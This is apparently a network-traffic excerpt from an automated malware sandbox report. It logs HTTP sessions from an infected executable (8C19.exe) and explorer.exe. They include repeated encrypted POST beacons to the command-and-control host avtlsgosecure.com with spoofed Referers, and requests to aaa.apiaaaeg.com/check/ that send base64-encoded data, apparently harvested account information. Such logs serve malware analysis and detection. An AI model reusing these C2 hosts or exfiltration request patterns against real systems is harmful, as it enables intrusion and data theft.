e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63 c1 43 53 6d 2b a9 b8 33 17 10 93 0d fe 52 14 cc f6 03 5c e0 17 a5 ac 37 e9 a8 44 fd 01 bc 68 42 c4 5e d8 07 96 b1 8d 7e c5 23 ef d2 c8 90 b5 3f 98 00 4e fc b3 2b e5 63 ae 4b 20 88 a4 58 65 ea ee a5 8e ae 58 00 2f a2 f5 7d a4 00 27 83 21 dd 64 5f c1 fd 28 0d e4 0a ba 64 a5 46 2b 8e 08 5d 0b c1 01 73 70 2a 14 62 03 02 76 c4 e9 ba 55 07 90 08 37 a5 ef 08 a8 1c 1e e3 16 8a de d8 01 1a 83 4a 26 dd 0d 32 28 90 ae 25 2c ee 52 ae 71 73 0d 95 e7 11 2d 4e a5
                                                                                                                                  Data Ascii: 2B43S;E4F,`jZVD.G.pP17GCf]X;+1;!t+4TPPkmGk/ >H]memuN=nNck!f3,&#9%P6C/sA|8%l*<\1"Gd(j!v}J/x$k&w}[e/? GV5ku]H:~bOMe,aYrdEqP}on;LJ$FF)wpGNp5}G+ ]NT;d#ggl.7r&7L63ylRKKyrJV,IcWYWmBHq&F}nIw(;Mr *1uI*deiU=GiRw&WHCtWb[[C}i6^a|O__ o)35KtO7?)l}58(|# LOxGMFL4XXkXcpE{Djp7S5w=3]O)#ZI%Q:<y#cH?)pU3>g_J5o6h<I:h)fYZBJ{_1<BZIcA*$%;4:fita379edCb.[,GHL8\MUnO"*n7h`J0k<pPlYa}1-r,~fAg\Ac|Ush{cCSm+3R\7DhB^~#?N+cK XeX/}'!d_(dF+]sp*bvU7J&2(%,Rqs-N
                                                                                                                                  Oct 17, 2022 22:07:11.258229017 CEST5905INData Raw: dd fd 5f b1 09 99 ed be 2a e9 0b 03 a0 cc 0c eb 1b d8 27 46 6b a5 cf d9 84 0f a2 38 07 df bf 95 9a 91 dd bf 7d 90 86 61 bb bb 44 4a ab 65 90 82 9f 02 6a 66 ed d5 48 0b 74 31 30 ce 07 c0 36 77 e4 24 d9 1a 4d 03 38 87 53 f5 76 84 36 3f a0 c8 9e 93
                                                                                                                                  Data Ascii: _*'Fk8}aDJejfHt106w$M8Sv6?}9tsko?0:~<6SV)$)UL3u,e>K[L<NVqgV(DS:jV9JHUhEHsRRqqn^E7:{a`E2~
                                                                                                                                  Oct 17, 2022 22:07:11.258254051 CEST5906INData Raw: 31 17 10 25 4a df e0 21 e5 5d 2f c0 d3 42 57 65 c0 f1 fd 09 4b 66 52 c6 42 54 db a7 2a 02 3f 74 6a 8c f7 82 b0 f3 33 43 24 c5 1e b8 f6 f9 8d fd db e6 aa 0d 5d d5 b6 b0 99 a4 2d 86 4d 3a c8 d7 80 ec b3 ef 43 68 d7 d6 2a e6 45 2b 8d 90 9d d9 51 95
                                                                                                                                  Data Ascii: 1%J!]/BWeKfRBT*?tj3C$]-M:Ch*E+Q1i@@RKQUN^n7IS,^gIB#RT+T-t{xd|,(,HOYsXz[6&NtQX;QaA4%dV,vAMN
                                                                                                                                  Oct 17, 2022 22:07:11.258277893 CEST5907INData Raw: 88 7d 12 d6 b0 38 c0 91 25 ae 47 c0 03 29 2a e7 27 bb 5f d1 3d e9 86 c2 4f da 97 ac 2b 6d ff cb 1d 57 d1 2e 97 d4 6c a4 9f 78 ca 3a bb 08 23 66 9f a5 1c 73 9d df 48 56 03 82 4b 24 24 fc 9e de b7 c9 98 79 ee b2 65 a3 72 7d da ca e9 1c 7a f6 21 5d
                                                                                                                                  Data Ascii: }8%G)*'_=O+mW.lx:#fsHVK$$yer}z!]Qf')@XC!\&3P[YIf[_#HvpFG?[}zTu|tty`jiM<T}Pmmc3+3]rnvSA*>6Z?I
                                                                                                                                  Oct 17, 2022 22:07:11.260906935 CEST5908INData Raw: b7 87 d0 71 a8 79 6a df b6 b1 41 d5 8e 0c 2f 48 d4 69 e3 d1 9f bb ee c9 c3 86 8e cc 10 cc 03 65 cf 30 af d3 12 04 80 d0 a8 1e 47 ba aa d8 67 30 a6 47 9f 1f 93 57 fc 57 6d e4 6b 80 53 d0 5e 4d a0 0c 0d 3c 8b 39 0b b4 13 82 ab 76 a9 f3 2d 94 12 42
                                                                                                                                  Data Ascii: qyjA/Hie0Gg0GWWmkS^M<9v-BJm$<&oK1SkR8N!o4swoN:*A`!"0T$r\)&SvX2B Ge5|NBG-@HP8Y 7bn]LH<xY.3
                                                                                                                                  Oct 17, 2022 22:07:11.260931969 CEST5910INData Raw: 35 61 0f e6 f4 3c ea 5f 79 d9 38 88 ca 94 d0 64 da 8b 1e f1 a5 27 e9 04 a1 cb f5 4c 83 e1 0b ea e6 d8 97 ef d3 cb e9 eb 7c 70 a9 c4 c2 ce 1a 7f d8 1a f9 e8 5a d5 18 bc d9 14 8d 33 2d 0b 7d cf 39 68 ad d3 06 3a ff fb 96 34 3b bf 53 cc be 43 49 76
                                                                                                                                  Data Ascii: 5a<_y8d'L|pZ3-}9h:4;SCIvv|$:1["`ifwmBx%~&nWa=XU$OQ.IX9d$HOI_\wTvPx<Z7VD|rT0Pk{C*ORtm}
                                                                                                                                  Oct 17, 2022 22:07:11.260948896 CEST5911INData Raw: b4 26 f0 80 70 2e ff f2 ed 53 de 7d 82 b9 8e 9a 19 49 73 0a 22 e7 63 05 1e 44 86 2f fd be 71 46 22 f9 96 dd 06 da 78 61 a8 69 94 04 3d 9f fc fd 79 cc 71 57 79 77 10 6d 54 77 a5 a1 d6 73 f0 8d 4c 22 6c 4d 3a 53 14 69 e8 12 7f cc 43 8b cc a6 d9 87
                                                                                                                                  Data Ascii: &p.S}Is"cD/qF"xai=yqWywmTwsL"lM:SiC^?x^lk2ZLG6\'-s,5nW!kraTI`[-q+O3lxbUf+x`qq="a3dF:ieepCqYDD.&~6sUW`1mh
                                                                                                                                  Oct 17, 2022 22:07:11.260962963 CEST5912INData Raw: 4e 2c d6 09 9d 2c 57 2c f8 91 97 2c b2 33 d9 74 98 3a 28 e8 c4 46 97 49 06 2b dc cf 9e 10 76 f7 44 0a 90 03 2d b8 c2 04 a9 4a 4f fc 7e 0b 67 19 8e de 91 db 72 4a 95 ad b7 8e 1d af 81 f6 8d 56 68 29 bc 1b 12 e5 42 52 a0 56 58 05 bb 13 f9 97 19 24
                                                                                                                                  Data Ascii: N,,W,,3t:(FI+vD-JO~grJVh)BRVX$ZHrsNF;X/}iNQ.F`BI@_N{HOp;eoFs%WqWPJuDSjK^A9aiG@<dI
                                                                                                                                  Oct 17, 2022 22:07:11.262633085 CEST5914INData Raw: 16 41 ad 20 54 19 aa 0d 6d b5 76 db ab 49 6a 4a fb 57 63 0a 15 fc 0c e2 b8 d9 f1 2a 48 e6 9e 4e d7 88 7b 33 45 22 e7 86 3d a0 5b 9a 69 b3 e0 1f c1 93 5e 71 3e 16 f0 ec 39 32 32 46 6c 4b 52 48 32 0e 06 bc e6 dd b3 dc 7e a9 c3 21 24 11 9b b7 1c df
                                                                                                                                  Data Ascii: A TmvIjJWc*HN{3E"=[i^q>922FlKRH2~!$>GZlU}G'QO]#o~l{aq`w)e Mh#l\>lo)w>KyQpcE[hnZHj-M2}F!l0Zh
                                                                                                                                  Oct 17, 2022 22:07:11.262670994 CEST5915INData Raw: 01 3b fa 34 d1 ed 1f 3d cc b4 79 4f 77 4c b6 29 ac 33 3e 76 f6 01 25 48 cf d2 75 c7 0d c0 4e 6b 8a f9 5e b9 17 72 ec 9b 66 77 e7 70 b5 74 d5 41 66 b9 a3 9c 05 da 0d f2 a9 27 f9 c3 e1 16 27 c7 85 28 1b a3 a1 a8 eb ca 29 3b f3 5a d5 e1 58 1b 55 a4
                                                                                                                                  Data Ascii: ;4=yOwL)3>v%HuNk^rfwptAf''();ZXUvq;[G:G (/y'd3O)5%2(}c-XK]Y\dWt$V\EfLEa^xJvjQK'Qti!H`]
                                                                                                                                  Oct 17, 2022 22:07:11.299542904 CEST5916INData Raw: d0 35 33 33 f3 56 c5 50 40 d5 34 c9 37 7b 21 f6 8e b8 c7 0d 68 9a 45 a3 52 08 91 dc a8 22 bc 47 ea b5 31 9e b4 09 cf 91 5f 5e a1 37 fa 19 5d 19 e3 82 27 79 1a 8f 2c 1d eb df 9e 52 80 e6 49 fc ff fd c8 d7 93 91 89 29 67 e8 f6 52 81 1a f5 09 5c 44
                                                                                                                                  Data Ascii: 533VP@47{!hER"G1_^7]'y,RI)gR\DmAr:fh)mj1T}mVjg7S~n%HNbeK?\Q|t=@(v9`L%c".wl`w0[N,Z+xJ+oS_C1
                                                                                                                                  Oct 17, 2022 22:07:11.564759016 CEST6070OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://rpnkx.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 268
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.564841986 CEST6070OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 97 02 1f d3 26 f2 fe 75 c9 1b 47 25
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uG%I(DP";JY4-V^I)+"J(Uaem*,8~0(u,EG~;~xmm{'N 0!!6(2L2)i?Egu7,Jv=+PZ
                                                                                                                                  Oct 17, 2022 22:07:11.681624889 CEST6070INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:11.690139055 CEST6070OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://clcjalto.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 200
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.690223932 CEST6071OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 96 02 1f d3 26 f2 fe 75 ef 66 47 1e
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&ufG.//.%LNN~p"(,ar4DMI#^bQH8c$C(s~x-hsR\h&AWE>g<0Y'11F\@?
                                                                                                                                  Oct 17, 2022 22:07:11.804989100 CEST6071INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:11.963156939 CEST6072OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://grafs.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 273
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.963213921 CEST6072OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 95 02 1f d3 26 f2 fe 75 d7 7c 41 49
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&u|AIBOB@s#fG--")Q'\NJ/Hqb0`fMazJH!7g6bZBb2#vul0~L.Hkap3,9q|6F Y9z(=tR
                                                                                                                                  Oct 17, 2022 22:07:12.079642057 CEST6072INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:12.196327925 CEST6073OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://dhlyfpb.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 145
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:12.196382999 CEST6073OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 94 02 1f d3 26 f2 fe 75 c5 7d 26 16
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&u}&FMLk4T#SN0='^0v*M[a#F>J~TQza^=i
                                                                                                                                  Oct 17, 2022 22:07:12.312789917 CEST6073INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:12.366313934 CEST6074OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gnnnraawcb.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 133
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:12.366372108 CEST6074OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 93 02 1f d3 26 f2 fe 75 fe 59 26 50
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uY&P\4.0AZta?3RlW<B0C1W!ozvx0
                                                                                                                                  Oct 17, 2022 22:07:12.481183052 CEST6074INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:12 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 73
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3
                                                                                                                                  Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
                                                                                                                                  Oct 17, 2022 22:07:12.930023909 CEST6299OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://mkheots.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 113
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:12.930119991 CEST6299OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 92 02 1f d3 26 f2 fe 75 b3 6e 2b 18
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&un+GZt0"y`"Mb"P}$Gc
                                                                                                                                  Oct 17, 2022 22:07:13.046180964 CEST6299INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:13 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:13.918077946 CEST6300OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pakvlb.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 159
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:13.918152094 CEST6300OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 91 02 1f d3 26 f2 fe 75 c3 5b 3f 53
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&u[?S'B"P17mj0YER3HA#&(mpm'_$Nf;2
                                                                                                                                  Oct 17, 2022 22:07:14.032011032 CEST6300INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:13 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:14.182276964 CEST6300OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nyftrqq.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 363
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:14.182348967 CEST6301OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 90 02 1f d3 26 f2 fe 75 a3 65 53 1d
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&ueSLy(U@MJ[4Y^GDxAOE0Iw+^b/1-/*/:y1s`pUJOryn#Jb*\\_2JJQ!ZB81tHSIJgwmP
                                                                                                                                  Oct 17, 2022 22:07:14.298707008 CEST6301INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:14 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:15.882101059 CEST6302OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://avqnngwqw.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 225
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:15.882164955 CEST6302OUTData Raw: a4 60 f6 0d fa 42 d5 5c 5a c2 3d 83 9f 13 dd 3a c4 db aa 66 f0 8d 91 ab 61 b3 7c 8d 76 dc 17 39 c8 4f 44 82 7b b6 ee 2f ad 26 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 6b 58 a4 64 1d d4 39 e2 12 d0 66 9f 02 1f d3 26 f2 fe 75 d1 69 03 48
                                                                                                                                  Data Ascii: `B\Z=:fa|v9OD{/&{:s RkXd9f&uiH@2uGRGsS8I%f6B^[^%WVBTR.T5?whf1S<or$U>}hMPA<R"t0_row3bn/CYn
                                                                                                                                  Oct 17, 2022 22:07:15.996644020 CEST6302INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:15 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:16.018100977 CEST6302OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://tkavdryu.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 147
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:16.133193970 CEST6303INHTTP/1.1 200 OK
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:16 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 0
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Oct 17, 2022 22:07:16.158435106 CEST6303OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ewgonaqm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 266
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:16.274126053 CEST6304INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:16 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  content-length: 44
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 9b eb 8b f1 32 ae ce 95 a4 68
                                                                                                                                  Data Ascii: %S`Nh&WQY^]eu2h


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  19192.168.2.54970645.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:11.360502005 CEST5998OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:11.545358896 CEST6068INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 54 58 68 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 78 73 61 57 56 47 54 6c 68 68 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6d 70 6e 65 6b 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 70 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qTXhMQ0p5WVc1a1gzTjBjaUk2SWxsaWVGTlhhZXlKemFXUWlPall6TmpnekxDSjBhVzFsSWpveE5qWTJpSjk=0
                                                                                                                                  Oct 17, 2022 22:07:11.557333946 CEST6069OUTPOST /check/?sid=63683&key=ea932dc463661e5cd554f4fd13e01a3a HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:11.557406902 CEST6069OUTData Raw: 57 56 64 57 62 46 70 58 56 6d 78 61 56 31 5a 73 53 57 70 76 5a 30 6c 71 52 58 70 68 62 55 5a 77 59 6e 6c 4a 63 30 6c 44 53 6e 52 5a 56 30 31 70 54 32 6c 42 61 56 70 58 52 6d 74 4f 56 31 4a 70 54 30 52 53 61 30 31 58 55 6d 70 4f 61 6c 70 74 54 57
                                                                                                                                  Data Ascii: WVdWbFpXVmxaV1ZsSWpvZ0lqRXphbUZwYnlJc0lDSnRZV01pT2lBaVpXRmtOV1JpT0RSa01XUmpOalptTWpZNE5qazRZamM0Wm1ReE5HSTFNRGdpTENBaWNHRjVTVzVtYnlJNklHWmhiSE5sTENBaWRXbGtJam9nSWpFeE1UTWlMQ0FpZFc1ZmNIZGtJam9nSWV5SmhZMk52ZFc1MFNXUWlPaUFpSWl3Z0ltTnZZMjlrWlNJNkl
                                                                                                                                  Oct 17, 2022 22:07:11.731040955 CEST6071INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 31 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 33 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 1b{"status":3,"accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.549699157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  20192.168.2.54971134.91.216.4980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:20.761837006 CEST6855OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://yuvwvqgqwb.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 200
                                                                                                                                  Host: avtlsgosecure.com
